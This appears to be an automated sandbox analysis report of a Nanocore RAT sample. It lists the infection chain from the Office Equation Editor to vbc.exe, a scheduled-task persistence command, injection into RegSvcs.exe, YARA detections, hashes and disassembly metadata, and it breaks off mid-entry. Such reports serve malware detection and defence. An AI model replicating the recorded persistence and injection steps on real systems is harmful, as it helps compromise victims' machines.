Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2480 Parent PID: 1320

General

Start time:	08:02:22
Start date:	12/04/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x11d0000
File size:	802304 bytes
MD5 hash:	A3CBEB3E732B11954572B3EE6755242C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 2676 Parent PID: 2480

General

Start time:	08:02:24
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gmSlQSien' /XML 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp'
Imagebase:	0x910000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: RegSvcs.exe PID: 2696 Parent PID: 2480

General

Start time:	08:02:25
Start date:	12/04/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Imagebase:	0x9c0000
File size:	32768 bytes
MD5 hash:	72A9F09010A89860456C6474E2E6D25C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.2393755361.00000000005C0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.2393755361.00000000005C0000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	moderate

Chronological Activities

Analysis Process: smtpsvc.exe PID: 1296 Parent PID: 1388

General

Start time:	08:02:44
Start date:	12/04/2021
Path:	C:\Program Files (x86)\SMTP Service\smtpsvc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
Imagebase:	0x200000
File size:	32768 bytes
MD5 hash:	72A9F09010A89860456C6474E2E6D25C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2480 Parent PID: 1320 vbc.exeCOMMON

Executed Functions

Function 00B739B8, Relevance: 7.7, Strings: 6, Instructions: 174COMMON

Download Yara Rule

Strings

hrw, xrefs: 00B73A41
(tw, xrefs: 00B73A18
(tw, xrefs: 00B73B98
:@lq, xrefs: 00B73A2F
hrw, xrefs: 00B73B74
(tw, xrefs: 00B73AAF

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID: (tw$(tw$(tw$:@lq$hrw$hrw
API String ID: 0-2198096729
Opcode ID: 84896e72eab81fc021219855bdcd94ed3ca1c77d61d34c105f2f79efb9c441d1
Instruction ID: a71373131210effb4d34cba14e52ce3f1084527c3bf06cdc1e211892f8c354f6
Opcode Fuzzy Hash: 84896e72eab81fc021219855bdcd94ed3ca1c77d61d34c105f2f79efb9c441d1
Instruction Fuzzy Hash: E371DEB4E01208DFCB08DFA5D9955AEBBF2FF89340F20946AD41ABB364DB345A41DB14

Uniqueness

Uniqueness Score: -1.00%

Function 00B743A0, Relevance: 4.0, Strings: 3, Instructions: 207COMMON

Download Yara Rule

Strings

(tw, xrefs: 00B7441F
T, xrefs: 00B745F1
Hsw, xrefs: 00B74618

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID: (tw$Hsw$T
API String ID: 0-2677085342
Opcode ID: 9dc2b424a0d3f8b9fac0e013c7f6a8886b044b68ff7897434cf4d416790c33a2
Instruction ID: c3ad0f5194efe01bfe7d1064ec836a438481c2ad8db6c117c131fe2b6a9693a2
Opcode Fuzzy Hash: 9dc2b424a0d3f8b9fac0e013c7f6a8886b044b68ff7897434cf4d416790c33a2
Instruction Fuzzy Hash: F791D174D05209DFCB44CFA9E9805AEFBF2FF89301F20956AD829BB254D7349A01CB59

Uniqueness

Uniqueness Score: -1.00%

Function 002EDA30, Relevance: 3.9, Strings: 3, Instructions: 158COMMON

Download Yara Rule

Strings

Hsw, xrefs: 002EDBC4
hrw, xrefs: 002EDA63
Hsw, xrefs: 002EDB31

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: Hsw$Hsw$hrw
API String ID: 0-4174418137
Opcode ID: 6d90e9aa499f568bba5d75c2a2d3d44859218627bba43f69575e6487ccc8c0f5
Instruction ID: 07f09743130c1e92841488ee66ff52420b3ad2f346198d2671f661da1440e45d
Opcode Fuzzy Hash: 6d90e9aa499f568bba5d75c2a2d3d44859218627bba43f69575e6487ccc8c0f5
Instruction Fuzzy Hash: 387168B8D55249DFCB08CFE5D9886AEBBB2FF49300F60906AD806A7360D7741A81DF50

Uniqueness

Uniqueness Score: -1.00%

Function 002EA739, Relevance: 2.6, Strings: 2, Instructions: 89COMMON

Download Yara Rule

Strings

R]qq, xrefs: 002EA7FC
R]qq, xrefs: 002EA7BB

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: R]qq$R]qq
API String ID: 0-3739772065
Opcode ID: b185500e797eec1f3a9c467c72b857057a53b2a26659238dc6d8e5a77f052dea
Instruction ID: 32af55d9dbf67abb66fbd1898dd64438f77549f01a69f7c274eed886e7a0110e
Opcode Fuzzy Hash: b185500e797eec1f3a9c467c72b857057a53b2a26659238dc6d8e5a77f052dea
Instruction Fuzzy Hash: E1310771E102588FEB18DF6BD84479EBBB3AFC9300F54C0AAD448AB255D7705A858F52

Uniqueness

Uniqueness Score: -1.00%

Function 002E0A28, Relevance: 2.5, Instructions: 2494COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb2b65bc9da5532b03a971bcbf32c6e752ef1654e8eba37b7f21f9a5be3a4e1c
Instruction ID: b304bdd7f563bec2c8c7e3aa093d48f8f1a8881660f8f80440c0a5e1665c3767
Opcode Fuzzy Hash: cb2b65bc9da5532b03a971bcbf32c6e752ef1654e8eba37b7f21f9a5be3a4e1c
Instruction Fuzzy Hash: C843A634901619CFC724DB34C894BAEB7B1FF9A305F5156E9E409AB2A0EB316E85CF05

Uniqueness

Uniqueness Score: -1.00%

Function 006D0507, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 006D0587

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: cce2e6b9bef5ddfd93295dbf4cf42ad4c26eef87a77e1279d9db3ea1fc5575ae
Instruction ID: 398774cb7e4898f0ebfb71181893b8f1c30becceb5c9e14ff6e3d0b0588f7b30
Opcode Fuzzy Hash: cce2e6b9bef5ddfd93295dbf4cf42ad4c26eef87a77e1279d9db3ea1fc5575ae
Instruction Fuzzy Hash: D421BF755093849FEB22CF25DC44B92BFB4EF16310F0884DAE9858B263D2719908DB62

Uniqueness

Uniqueness Score: -1.00%

Function 006D1E63, Relevance: 1.6, APIs: 1, Instructions: 56nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 006D1ED1

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 85c9c677be0f3af9f599edd4c96e4f5d4f94903eb2703a79c1591dc5c76b4048
Instruction ID: 1607067e6c5be08c19d130cbaf292f99aec175e710f489367f9b7697cb09222c
Opcode Fuzzy Hash: 85c9c677be0f3af9f599edd4c96e4f5d4f94903eb2703a79c1591dc5c76b4048
Instruction Fuzzy Hash: BC117975409780AFD7228B15DC45B52FFB4EF06310F09849BEE848B6A3D276A908DB62

Uniqueness

Uniqueness Score: -1.00%

Function 006D053E, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 006D0587

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 958bc282ee6bfd27a9708367e03bdbfb83c600105fbe74a245fab503a25a7954
Instruction ID: 72cd08a02f6843659be8a32796d09afc6eb6c4aac0c36434cf80af49cf2fd308
Opcode Fuzzy Hash: 958bc282ee6bfd27a9708367e03bdbfb83c600105fbe74a245fab503a25a7954
Instruction Fuzzy Hash: 16115A75900700DFEB20CF55E985BA6FBE5EF04720F0884AAED4A8B752D271E814DF61

Uniqueness

Uniqueness Score: -1.00%

Function 006D086C, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 006D08CC

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: b771c78cf9b58a06e5da374974c1595ed5a6ddb9df356ed234279c943c3d481e
Instruction ID: 3b1c6833eb1fdcb9a7c282ad4bd544fe31d123c282e8e768a3779b0e80479d32
Opcode Fuzzy Hash: b771c78cf9b58a06e5da374974c1595ed5a6ddb9df356ed234279c943c3d481e
Instruction Fuzzy Hash: 7D119E31508780AFDB228F15DC45B52FFB4EF06320F08849EEE854B662C275A819DB61

Uniqueness

Uniqueness Score: -1.00%

Function 006D088E, Relevance: 1.5, APIs: 1, Instructions: 39nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 006D08CC

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: f000455bccf30519030dafdae7e77b92c424e3cbf66254d3666bc6a278c03cb5
Instruction ID: d445564f18154dc6278554e871b95b315bc61adff1ff34201a9943e96b8bec4f
Opcode Fuzzy Hash: f000455bccf30519030dafdae7e77b92c424e3cbf66254d3666bc6a278c03cb5
Instruction Fuzzy Hash: AC018F31900740DFEF208F55D885B62FFA1EF14721F08859ADE494B712C271A419EBA2

Uniqueness

Uniqueness Score: -1.00%

Function 006D1E96, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 006D1ED1

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 0a7c5360803067c1480f9b6cccf6a31d0847ad63f2d4848ca8975866416177d9
Instruction ID: 66b6dbe481fa6a728cb2a6c8eea0c48ffc44e5cecb6618f7e35fe102b05c9633
Opcode Fuzzy Hash: 0a7c5360803067c1480f9b6cccf6a31d0847ad63f2d4848ca8975866416177d9
Instruction Fuzzy Hash: 24018B31900740EFEB208F45D885B62FFA1EF19720F08849ADE494A712D2B1A518DB62

Uniqueness

Uniqueness Score: -1.00%

Function 002EED58, Relevance: 1.5, Strings: 1, Instructions: 225COMMON

Download Yara Rule

Strings

@ep, xrefs: 002EEE3A

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: @ep
API String ID: 0-323641960
Opcode ID: 5c3675c78fe2f24cdd2ce338744f4e9f5a437b90f51de4e1be18024c000db903
Instruction ID: edd4e86457dbb611730ab3e190c697e167a2b5e3eff170cbf8540f6edd06552e
Opcode Fuzzy Hash: 5c3675c78fe2f24cdd2ce338744f4e9f5a437b90f51de4e1be18024c000db903
Instruction Fuzzy Hash: 8BA15574D60249CFCF14DFA5EA946DDBBB5FB4A310F61542AD00ABB2A4EB701940CF24

Uniqueness

Uniqueness Score: -1.00%

Function 00B73368, Relevance: .3, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed4fb446ee2340b8c2f310eae2beaa5ea26d16ff577829f8fcb7c86383f8f114
Instruction ID: e04469459b9ac44a557c56562b5ce52e3b5230994b2e243ad2243ab853ffb298
Opcode Fuzzy Hash: ed4fb446ee2340b8c2f310eae2beaa5ea26d16ff577829f8fcb7c86383f8f114
Instruction Fuzzy Hash: 6ED12574E06208DFDB14CFA4D985BDDBBF1EB49710F20906AE419BB294DB345A81DF28

Uniqueness

Uniqueness Score: -1.00%

Function 002E8418, Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47ac49cad25a31227cbd0b0b29416c19c260a2ff59f4ebc1d0b7a193f5e138e2
Instruction ID: 8fc9727ba5ef6f20e8e520a97124c1d851dee9479c9cc06dc3bb8667d706494f
Opcode Fuzzy Hash: 47ac49cad25a31227cbd0b0b29416c19c260a2ff59f4ebc1d0b7a193f5e138e2
Instruction Fuzzy Hash: 4AC18C7496520ACFCB04CFA5C5808AEFBF1FF49310F609959C04ABB654CB35AA91CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B71078, Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15ec49f95c0e09ed633391e1839a76678f94ae52f7b945c313846497e80d3a06
Instruction ID: 45935eac5460685e9c6e4d2fcc3edb6cd394e0a650439ff4efd368d90b62444e
Opcode Fuzzy Hash: 15ec49f95c0e09ed633391e1839a76678f94ae52f7b945c313846497e80d3a06
Instruction Fuzzy Hash: 9AA12470D0120ADFCB04DFAAD5815AEFBF2FF88310F20C95AD529AB255D7349A418FA5

Uniqueness

Uniqueness Score: -1.00%

Function 002E5260, Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96b19c918991fbcd7c7c9eb33c53bd3da6c35fd186934d170278ed38005e8578
Instruction ID: 18612f18e59e0e704703003ed22261d02ce6988facaff4161638d8165b8ce16e
Opcode Fuzzy Hash: 96b19c918991fbcd7c7c9eb33c53bd3da6c35fd186934d170278ed38005e8578
Instruction Fuzzy Hash: EDA13670D60668CBDF10DFAAC8407DDBBB2BF89318F9481A9D519BB240DBB05994CF11

Uniqueness

Uniqueness Score: -1.00%

Function 002E55D9, Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a2fcf51f155eee4dcbfef349bd001f6720c02f9a48bdaa9e6d91e72b686caaa
Instruction ID: 2c88c36466a0fc8e4511d391bc9ed68588a1e1093d62d082e0818c537d5bce22
Opcode Fuzzy Hash: 5a2fcf51f155eee4dcbfef349bd001f6720c02f9a48bdaa9e6d91e72b686caaa
Instruction Fuzzy Hash: FE918BB0D61698CFDB00DFA6C5846ADFBF2BF89318FA4C129D014AB295D7349950CF61

Uniqueness

Uniqueness Score: -1.00%

Function 002E5210, Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6a382a2d0df142fdf37064a776afcfa72fd6627e16afb62ba1c0f57a2eec35b
Instruction ID: a37ba6480f746096cd08f36ca9a92358340cff8adeb1827b600f0aa474338133
Opcode Fuzzy Hash: d6a382a2d0df142fdf37064a776afcfa72fd6627e16afb62ba1c0f57a2eec35b
Instruction Fuzzy Hash: 94913A70D60668CFDB14DFA6C8407ADBBB2BF89318F94C0A9D549BB241DB744A94CF21

Uniqueness

Uniqueness Score: -1.00%

Function 002E6550, Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c9e244f387366fa6bb701c0691f633c8af2a654cfe596cf787add9c0bd8f17c
Instruction ID: 59c3ec4ae80b839f05a099f2e9bc2bcd9f34594ad1b25f93bfcf9b6889afcd68
Opcode Fuzzy Hash: 9c9e244f387366fa6bb701c0691f633c8af2a654cfe596cf787add9c0bd8f17c
Instruction Fuzzy Hash: C261D274E11249DFDB08CFE6D984AAEBBB2FF89300F20806AD405AB354DB749945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E4450, Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 857b47c21eeedc80332a5d6fcb72405f477b8dbbefdcdf5c9db96bd053a0b852
Instruction ID: 0f57b8c2d250eb9e0b850c3a8f26d1019883df027605690674812c1281091313
Opcode Fuzzy Hash: 857b47c21eeedc80332a5d6fcb72405f477b8dbbefdcdf5c9db96bd053a0b852
Instruction Fuzzy Hash: 815115B1D006098FCF15EFAAC8808EDFBB2BF9A310F64852AD515BB261DB305A55CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B71500, Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c5f8231b1506feaff6de13d3837eeca8c5e5abfe3874b6062e277a35a41fcc3
Instruction ID: c43a55426c9a18754804b33849d07b4047b9fe9276fec56c72dd5b0bc238674e
Opcode Fuzzy Hash: 7c5f8231b1506feaff6de13d3837eeca8c5e5abfe3874b6062e277a35a41fcc3
Instruction Fuzzy Hash: C0515770D0521A8FCB08CFA9D5805AEFBF2BF99310F24C996D02AB7254D7349A409B65

Uniqueness

Uniqueness Score: -1.00%

Function 002E4790, Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 646382f5fde474a72dea1f25d23f2183cc7440d43cc6970f06c1a0609da44a40
Instruction ID: c970611b17515940b052d7f102b4091f5ec48d0a763aa4782e2e0d7958cb631f
Opcode Fuzzy Hash: 646382f5fde474a72dea1f25d23f2183cc7440d43cc6970f06c1a0609da44a40
Instruction Fuzzy Hash: 4B61AE74E00248DFDB04EFAAC884A9EBBF2BF89304F648069E819AB364D7745955CF51

Uniqueness

Uniqueness Score: -1.00%

Function 002E6C48, Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdbb3c603f6d95ef3499ed438d79acc97052e4d8409d49b2aa9dc3fafa13e3a3
Instruction ID: 99564c5988fea252a49ea073cca3510821de5d82bccc0ee9a845a7c3471b970c
Opcode Fuzzy Hash: fdbb3c603f6d95ef3499ed438d79acc97052e4d8409d49b2aa9dc3fafa13e3a3
Instruction Fuzzy Hash: E0518A70D6824A8FCB04CFA6C4495AEFBF2EF99350F24E46AC055B7254C3349A51CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B72FB8, Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a99c387a088a102db7f0e53445c54f358314ae9b53a74fcc3ddd9306b941d44
Instruction ID: a35de361e195e309676f4ed31b2f3499f61946c7e3392785aa1969fb081e5f16
Opcode Fuzzy Hash: 6a99c387a088a102db7f0e53445c54f358314ae9b53a74fcc3ddd9306b941d44
Instruction Fuzzy Hash: AF412470E16209DFCB44DFA5D684AEDFBF1FB89750F20A46AD019B7210E7359A409B28

Uniqueness

Uniqueness Score: -1.00%

Function 002E75A8, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef567b4ee954425928f65a6140293465e8e14c62d80efa42288648df66b4758c
Instruction ID: fa9e24b7f0c8682862962183b15a922b12dd1af949797ad2753beace1e4ec193
Opcode Fuzzy Hash: ef567b4ee954425928f65a6140293465e8e14c62d80efa42288648df66b4758c
Instruction Fuzzy Hash: 8D21DBB1D056588FDB19CFA7D8446DEBBF2AFC9310F14C06AD409AA264DB350A55CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B72505, Relevance: 2.5, Strings: 2, Instructions: 18COMMON

Download Yara Rule

Strings

k4A0, xrefs: 00B7251B
Hsw, xrefs: 00B72516

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID: Hsw$k4A0
API String ID: 0-1614941084
Opcode ID: 0236d17fceb756b6ad1389be581310fd70821780708e241017cb4738e71086a0
Instruction ID: d6daf13301fa4254cfae6e92026e35b2e6f36a4e6d90f267aefada0be84cee65
Opcode Fuzzy Hash: 0236d17fceb756b6ad1389be581310fd70821780708e241017cb4738e71086a0
Instruction Fuzzy Hash: FEF0AE789052A88BDBA8DFA4C84479CBBB1FB49341F50CAAA950FB7354DB345E84CF14

Uniqueness

Uniqueness Score: -1.00%

Function 006D1812, Relevance: 1.6, APIs: 1, Instructions: 144fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 006D1921

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: fe94de4f000ccfa4ea7e5428d19a23c4429665bdfef2ad0a152078d3786cb466
Instruction ID: 0a3395110fcb8e5ada495e329718aca5482b70e8003c1666d59db92d4dc2c69f
Opcode Fuzzy Hash: fe94de4f000ccfa4ea7e5428d19a23c4429665bdfef2ad0a152078d3786cb466
Instruction Fuzzy Hash: 7D513B7150D3C0AFE7138B658C60A92BFB4AF07610F0944DBD9C4DF2A3D265A909D772

Uniqueness

Uniqueness Score: -1.00%

Function 006D1C87, Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,00000E40), ref: 006D1D37

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e2d45bab0032e37f0e66a9ad55edae645bee24de6aa02d7431437859a89cd221
Instruction ID: fe9733a1696ab6d3098cffbcb564852d429fd644db22f7813bad58c286dcf003
Opcode Fuzzy Hash: e2d45bab0032e37f0e66a9ad55edae645bee24de6aa02d7431437859a89cd221
Instruction Fuzzy Hash: C231B472504384AFE7228F21CC45FA6BFA8EF06310F04459BF985CB152D265A909DB71

Uniqueness

Uniqueness Score: -1.00%

Function 006D019C, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,00000E40), ref: 006D0248

Memory Dump Source

Source File: 00000004.00000002.2193943622.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: fd6f6d68cd58281aacee6fb3e64a4d1fe26483917afcb5c0ac61e2ac855432df
Instruction ID: e053d33011079848a58f7aa2eca893a85695e862130a879effc511568f59adf6
Opcode Fuzzy Hash: fd6f6d68cd58281aacee6fb3e64a4d1fe26483917afcb5c0ac61e2ac855432df
Instruction Fuzzy Hash: 2031D572504384AFEB22CF50DC45FA6BFA8EF06310F08849AE9848B193D675A909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0013AB26, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E40), ref: 0013ABD5

Memory Dump Source

Source File: 00000004.00000002.2193365081.000000000013A000.00000040.00000001.sdmp, Offset: 0013A000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 40c1a3b3e7f835cfb65ebd5507766a04f0677be0f238c1a8bf47eaaec370e3f6
Instruction ID: 45cf91f7ef6f656899c8c18ae3a55d463724c1292fa01e0fec0308ac644443cd
Opcode Fuzzy Hash: 40c1a3b3e7f835cfb65ebd5507766a04f0677be0f238c1a8bf47eaaec370e3f6
Instruction Fuzzy Hash: 2631A072544384AFE722CF11CC45FA7BBACEF06710F08859AF9858B152D265A909CB72

Uniqueness

Uniqueness Score: -1.00%

Function 0013B074, Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

APIs

SetConsoleCtrlHandler.KERNEL32(?,00000E40,?,?), ref: 0013B10E

Memory Dump Source

Source File: 00000004.00000002.2193365081.000000000013A000.00000040.00000001.sdmp, Offset: 0013A000, based on PE: false

Similarity

API ID: ConsoleCtrlHandler
String ID:
API String ID: 1513847179-0
Opcode ID: 889a827b84453fe0d761f8090f7a89ff5801d4d29bab8d7d62f6c3359fe459bf
Instruction ID: c60768bb02873f28f75e2890fe3de140ef3e4dea4675946edf9398e3085d3c00
Opcode Fuzzy Hash: 889a827b84453fe0d761f8090f7a89ff5801d4d29bab8d7d62f6c3359fe459bf
